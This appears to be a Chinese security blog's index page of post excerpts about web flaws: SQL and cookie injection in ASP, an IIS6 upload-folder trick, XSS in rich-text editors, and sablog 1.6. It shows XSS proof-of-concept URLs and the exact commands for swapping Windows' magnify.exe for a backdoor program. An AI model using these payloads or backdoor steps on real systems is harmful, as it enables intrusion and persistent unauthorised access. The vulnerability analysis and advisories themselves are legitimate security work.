风讯的产品,你还敢用吗?

鬼仔注:未测试。

作者:jannock

今日来分析一下风讯的产品的安全性。
风讯管方最新下载,FoosunCMSv4.0sp5完整版(含模板)。安装后,查看了一下代码,发现多处SQL 注入。不由心地发出一句:这样的产品,你敢用吗?
对于ASP版。
1、漏洞文件
阅读全文 »

Tags: , ,

最新SMSJ Version 8.0漏洞

作者:rover
帮朋友检测网站的安全性,用的是SMSJ Version 8.0,号称仿阿里巴巴的东西,注册企业会员后,登录管理,发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩,想起早期动易的那个注册漏洞
说起这个漏洞,完全是iis6引起的,在iis6的站点上,建立一个xx.asp的文件夹,然后在里面放一个改成gif后缀的asp木马,照样会按asp来执行,看了下服务器,八成是win2003,也就是iis6了然后我试着注册rover.asp的用户,注册那里到是过滤了特殊字符的,但是看了下,只是用简单的javascript限制的
代码如下:
阅读全文 »

Tags: , ,

Cookie注入是怎样产生的

作者:啊D

现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题!所以就有了Cookies注入~~

我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道
Request.QueryString (GET)

Request.Form (POST)!
呵,没错,这就是我们用于读取用户发给WEB服务器的指定键中的值!我们有时为了简化代码,会写成
ID=Request("ID")

这样写法是简单了,但问题就来了~~~我们先看WEB服务是怎样读取数据的,他是先取GET中的数据,没有再取POST中的数据,还会去取Cookies中的数据(晕,书上没有这么说,这是和小高交流时才知道~~看来书说的不全~~)
阅读全文 »

Tags: , ,

黑客入门之富文本编辑器的跨站脚本问题

来源:Neeao's Security Blog

富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户 POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对 IE浏览器.

一.首先是微软建议我们可能造成恶意脚本攻击的标签.

类似如下的

tag:

applet
base
basefont
bgsound
blink
body
embed
frame
frameset
head
html
ilayer
iframe
layer
link
meta
object
style
title
script

———————————–
阅读全文 »

Tags:

sablog 1.6 多个跨站漏洞

Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1
阅读全文 »

Tags: , ,

放大镜后门生成器

来源:红狼论坛
PS:刚刚在红狼论坛看到的,具体未测试…简单看了下,估计是类似以前那种 shift 后门差不多….
设本程序为ivy.exe则运行以下命令即可

copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe
copy ivy.exe %systemroot%\system32\magnify.exe
copy ivy.exe %systemroot%\system32\dllcache\magnify.exe

注:win+u,选择放大镜,输入你设定的后门启动密码,可执行cmd.exe和程序自己添加自定义用户(调用API防止cmd.exe被禁用)
阅读全文 »

Tags:

DNS批量溢出批处理代码

阅读全文 »

Tags:

发送 百度Hi 邀请

哪位朋友需要邀请的请留言
留下您的我email地址或者百度的ID都行
留email的需要去信箱里看信,留百度ID的则直接去百度登陆后收消息就OK了。
我开了我blog中guest组的评论权限,需要百度Hi 邀请的朋友留言吧~
不过这两天在外面,上网不方便,明天我会统一发放。

Tags: ,